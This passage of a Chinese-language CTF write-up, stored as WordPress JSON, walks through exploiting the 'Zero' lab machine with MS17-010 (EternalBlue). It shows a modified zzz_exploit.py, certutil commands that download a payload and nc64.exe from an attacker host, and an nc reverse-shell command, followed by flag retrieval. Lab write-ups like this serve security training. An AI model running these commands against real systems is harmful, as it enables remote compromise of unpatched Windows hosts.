\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/zero\/MS17-010]\n\u2514\u2500$ python2 zzz_exploit_change.py 192.168.10.100\nTarget OS: Windows Server 2016 Standard Evaluation 14393\nUsing named pipe: netlogon\nTarget is 64 bit\nGot frag size: 0x20\nGROOM_POOL_SIZE: 0x5030\nBRIDE_TRANS_SIZE: 0xf90\nCONNECTION: 0xffffc4071a296020\nSESSION: 0xffffb4067522e790\nFLINK: 0xffffb406750a2098\nInParam: 0xffffb4067509616c\nMID: 0x3a03\nunexpected alignment, diff: 0xb098\nleak failed... try again\nCONNECTION: 0xffffc4071a296020\nSESSION: 0xffffb4067522e790\nFLINK: 0xffffb406750b1098\nInParam: 0xffffb406750ab16c\nMID: 0x3a03\nsuccess controlling groom transaction\nmodify trans1 struct for arbitrary read\/write\nmake this SMB session to be SYSTEM\noverwriting session security context\nOpening SVCManager on 192.168.10.100.....\nCreating service benf.....\nStarting service benf.....\nSCMR SessionError: code: 0x41d - ERROR_SERVICE_REQUEST_TIMEOUT - The service did not respond to the start or control request in a timely fashion.\nRemoving service benf.....\nDone<\/code><\/pre>\n
\u53d1\u73b0\u5f39\u4e0d\u8fc7\u6765\u3002\u3002\u3002\u3002\u3002\u4e0d\u4f7f\u7528\u9ed8\u8ba4\u7684\u8bd5\u8bd5\uff1a<\/p>\n
certutil -a -urlcache -gmt -split -f http:\/\/192.168.10.104:8888\/shell.exe c:\\\\windows\\\\temp\\\\shell.exe<\/code><\/pre>\n
\n
-a<\/code>                \u5904\u7406\u975e\u8bc1\u4e66\u6570\u636e<\/p>\n
-f\t<\/code>               \u8986\u76d6\u73b0\u6709\u6587\u4ef6\u3002<\/p>\n
-split<\/code>          \u4fdd\u5b58\u5230\u6587\u4ef6\u3002<\/p>\n
-URLCache<\/code>      \u663e\u793a\u6216\u5220\u9664URL\u7f13\u5b58\u6761\u76ee\u3002<\/p>\n<\/blockquote>\n
def smb_pwn(conn, arch):\n        # smbConn = conn.get_smbconnection()\n\n        # print('creating file c:\\\\pwned.txt on the target')\n        # tid2 = smbConn.connectTree('C$')\n        # fid2 = smbConn.createFile(tid2, '\/pwned.txt')\n        # smbConn.closeFile(tid2, fid2)\n        # smbConn.disconnectTree(tid2)\n\n        # smb_send_file(smbConn, 'shell.exe', 'C', '\/system.exe') \n        #service_exec(conn, r'cmd \/c copy c:\\pwned.txt c:\\pwned_exec.txt')\n        service_exec(conn, r'cmd \/c certutil -a -urlcache -gmt -split -f http:\/\/192.168.10.104:8888\/shell.exe c:\\\\windows\\\\temp\\\\shell.exe')\n        # Note: there are many methods to get shell over SMB admin session\n        # a simple method to get shell (but easily to be detected by AV) is\n        # executing binary generated by "msfvenom -f exe-service ..."<\/code><\/pre>\n
\u7136\u540e\u6539\u4e00\u4e2a\u914d\u7f6e\u9009\u9879\uff0c\u5c31\u662fcheck\u9009\u7684\uff0c\u54ea\u4e2a\u90fd\u884c\uff0c\u8fd9\u91cc\u968f\u4fbf\u5f04\u4e86\u4e00\u4e2a\uff1a<\/p>\n
samr: Ok (64 bit)\nnetlogon: Ok (64 bit)\nlsarpc: Ok (64 bit)<\/code><\/pre>\n
\u7ed3\u679c\u53c8\u53d1\u751f\u4e86\u62a5\u9519\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/zero\/MS17-010]\n\u2514\u2500$ python2 zzz_exploit_change.py 192.168.10.100 netlogon\nTarget OS: Windows Server 2016 Standard Evaluation 14393\nTarget is 64 bit\nGot frag size: 0x20\nGROOM_POOL_SIZE: 0x5030\nBRIDE_TRANS_SIZE: 0xf90\nCONNECTION: 0xffffc407182ba020\nSESSION: 0xffffb406745019d0\nFLINK: 0xffffb406750ab098\nInParam: 0xffffb406750a216c\nMID: 0x2b03\nunexpected alignment, diff: 0x8098\nleak failed... try again\nCONNECTION: 0xffffc407182ba020\nSESSION: 0xffffb406745019d0\nFLINK: 0xffffb406750b7098\nInParam: 0xffffb406750b116c\nMID: 0x2b03\nsuccess controlling groom transaction\nmodify trans1 struct for arbitrary read\/write\nmake this SMB session to be SYSTEM\noverwriting session security context\nOpening SVCManager on 192.168.10.100.....\nCreating service JygC.....\nStarting service JygC.....\nSCMR SessionError: code: 0x41d - ERROR_SERVICE_REQUEST_TIMEOUT - The service did not respond to the start or control request in a timely fashion.\nRemoving service JygC.....\nDone<\/code><\/pre>\n
\u540c\u65f6\u53e6\u4e00\u8fb9python<\/code>\u7684http.server<\/code>\u4e5f\u6ca1\u63a5\u5230\u8bf7\u6c42\u3002\u3002\u3002\u3002\u3002\u3002\u53ef\u80fd\u662f\u56e0\u4e3a\u5403\u4e86\u4e2a\u996d\uff1f\u91cd\u542f\u9776\u673a\uff01\u8fd8\u662f\u4e0d\u884c\uff0c\u5c1d\u8bd5\u4fee\u6539\u914d\u7f6e\u9009\u9879\uff1a<\/p>\n
def smb_pwn(conn, arch):\n        # smbConn = conn.get_smbconnection()\n\n        # print('creating file c:\\\\pwned.txt on the target')\n        # tid2 = smbConn.connectTree('C$')\n        # fid2 = smbConn.createFile(tid2, '\/pwned.txt')\n        # smbConn.closeFile(tid2, fid2)\n        # smbConn.disconnectTree(tid2)\n\n        # smb_send_file(smbConn, 'shell.exe', 'C', '\/system.exe') \n        #service_exec(conn, r'cmd \/c copy c:\\pwned.txt c:\\pwned_exec.txt')\n        service_exec(conn, r'cmd \/c certutil -urlcache -gmt -split -f http:\/\/192.168.10.104:8888\/shell.exe c:\\\\windows\\\\temp\\\\shell.exe')\n        # Note: there are many methods to get shell over SMB admin session\n        # a simple method to get shell (but easily to be detected by AV) is\n        # executing binary generated by "msfvenom -f exe-service ..."<\/code><\/pre>\n
\u8fd9\u6b21\u6210\u529f\u4e86\uff0c\u4e0d\u8981-a<\/code>\uff1a<\/p>\n
\"image-20240810195857526\"<\/div><\/p>\n
\u7136\u540e\u5c1d\u8bd5\u6267\u884c\u4e00\u4e0b\uff1a<\/p>\n
def smb_pwn(conn, arch):\n        # smbConn = conn.get_smbconnection()\n\n        # print('creating file c:\\\\pwned.txt on the target')\n        # tid2 = smbConn.connectTree('C$')\n        # fid2 = smbConn.createFile(tid2, '\/pwned.txt')\n        # smbConn.closeFile(tid2, fid2)\n        # smbConn.disconnectTree(tid2)\n\n        # smb_send_file(smbConn, 'shell.exe', 'C', '\/system.exe') \n        #service_exec(conn, r'cmd \/c copy c:\\pwned.txt c:\\pwned_exec.txt')\n        service_exec(conn, r'cmd \/c c:\\\\windows\\\\temp\\\\shell.exe')\n        # Note: there are many methods to get shell over SMB admin session\n        # a simple method to get shell (but easily to be detected by AV) is\n        # executing binary generated by "msfvenom -f exe-service ..."<\/code><\/pre>\n
\u62c9\u5012\uff0c\u8fd8\u662f\u4e0d\u884c\uff0c\u8001\u8001\u5b9e\u5b9e\u7684\u4f20nc<\/code>\u5427\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/zero\/MS17-010]\n\u2514\u2500$ wget https:\/\/github.com\/int0x33\/nc.exe\/blob\/master\/nc64.exe \n--2024-08-10 07:58:22--  https:\/\/github.com\/int0x33\/nc.exe\/blob\/master\/nc64.exe\nResolving github.com (github.com)... 20.205.243.166\nConnecting to github.com (github.com)|20.205.243.166|:443... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: unspecified [text\/html]\nSaving to: \u2018nc64.exe\u2019\n\nnc64.exe                                            [  <=>                                                                                                ] 285.33K  1.39MB\/s    in 0.2s    \n\n2024-08-10 07:58:23 (1.39 MB\/s) - \u2018nc64.exe\u2019 saved [292179]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/zero\/MS17-010]\n\u2514\u2500$ chmod +x *<\/code><\/pre>\n
\u4e0a\u4f20,\uff0c\u53cd\u5f39shell\uff1a<\/p>\n
service_exec(conn, r'cmd \/c certutil -urlcache -gmt -split -f http:\/\/192.168.10.104:8888\/nc64.exe c:\\\\windows\\\\temp\\\\nc64.exe')\nservice_exec(conn, r'cmd \/c c:\\\\windows\\\\temp\\\\nc64.exe -e cmd 192.168.10.104 1234')<\/code><\/pre>\n
\u6210\u529f\uff01<\/p>\n
\"image-20240810201827791\"<\/div><\/p>\n
\u4f46\u662fpwncat-cs<\/code>\u53c8\u4e0d\u884c\u4e86\u3002\u3002\u3002\u3002\u3002<\/p>\n
\"image-20240810201901014\"<\/div><\/p>\n
\u6362\u4e00\u4e2a\uff1a<\/p>\n
\"image-20240810201931266\"<\/div><\/p>\n
\u67e5\u627eflag<\/h2>\n
C:\\>dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is E4E7-1761\n\n Directory of C:\\\n\n07\/16\/2016  06:18 AM    <DIR>          PerfLogs\n04\/15\/2024  07:04 AM    <DIR>          Program Files\n01\/06\/2017  08:09 PM    <DIR>          Program Files (x86)\n04\/15\/2024  07:34 AM    <DIR>          Users\n08\/10\/2024  08:11 PM    <DIR>          Windows\n               0 File(s)              0 bytes\n               5 Dir(s)  21,073,338,368 bytes free\n\nC:\\>cd Users\ncd Users\n\nC:\\Users>dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is E4E7-1761\n\n Directory of C:\\Users\n\n04\/15\/2024  07:34 AM    <DIR>          .\n04\/15\/2024  07:34 AM    <DIR>          ..\n04\/15\/2024  07:04 AM    <DIR>          Administrator\n04\/15\/2024  07:04 AM    <DIR>          Public\n04\/15\/2024  07:34 AM    <DIR>          ruycr4ft\n               0 File(s)              0 bytes\n               5 Dir(s)  21,073,338,368 bytes free\n\nC:\\Users>dir \/s *.txt\ndir \/s *.txt\n Volume in drive C has no label.\n Volume Serial Number is E4E7-1761\n\n Directory of C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadline\n\n04\/15\/2024  07:35 AM               307 ConsoleHost_history.txt\n               1 File(s)            307 bytes\n\n Directory of C:\\Users\\Administrator\\Desktop\n\n04\/15\/2024  07:32 AM                76 root.txt\n               1 File(s)             76 bytes\n\n Directory of C:\\Users\\All Users\\Microsoft\\Windows Defender\\Network Inspection System\\Support\n\n08\/10\/2024  02:45 PM             3,767 NisLog.txt\n               1 File(s)          3,767 bytes\n\n Directory of C:\\Users\\ruycr4ft\\Desktop\n\n04\/15\/2024  07:34 AM                58 user.txt\n               1 File(s)             58 bytes\n\n     Total Files Listed:\n               4 File(s)          4,208 bytes\n               0 Dir(s)  21,073,338,368 bytes free\n\nC:\\Users>type C:\\Users\\ruycr4ft\\Desktop\\user.txt\ntype C:\\Users\\ruycr4ft\\Desktop\\user.txt\nHMV{XXXXXXXXXXXXXXXX}\n\nC:\\Users>type C:\\Users\\Administrator\\Desktop\\root.txt\ntype C:\\Users\\Administrator\\Desktop\\root.txt\nHMV{XXXXXXXXXXXXXXXX}<\/code><\/pre>\n
\u53c2\u8003<\/h2>\n
https:\/\/youtube.com\/watch?v=9f_SOPJVFig<\/a><\/p>\n
https:\/\/blog.zgsec.cn\/archives\/172.html?scroll=comment-160<\/a><\/p>\n
https:\/\/blog.csdn.net\/yyyyyybw\/article\/details\/132741112?utm_medium=distribute.pc_relevant.none-task-blog-2~default~baidujs_baidulandingword~default-0-132741112-blog-120579915.235^v43^pc_blog_bottom_relevance_base5&spm=1001.2101.3001.4242.1&utm_relevant_index=3<\/a><\/p>\n
https:\/\/www.cnblogs.com\/backlion\/p\/7325228.html<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
Zero \u9700\u8981\u6539\u811a\u672c\u6267\u884c\u914d\u7f6e\u7684\u6c38\u6052\u4e4b\u84dd\u6f0f\u6d1e\u9776\u573a\u3002\u3002\u3002\u3002 \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~ […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-779","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/779","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=779"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/779\/revisions"}],"predecessor-version":[{"id":780,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/779\/revisions\/780"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=779"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=779"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=779"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}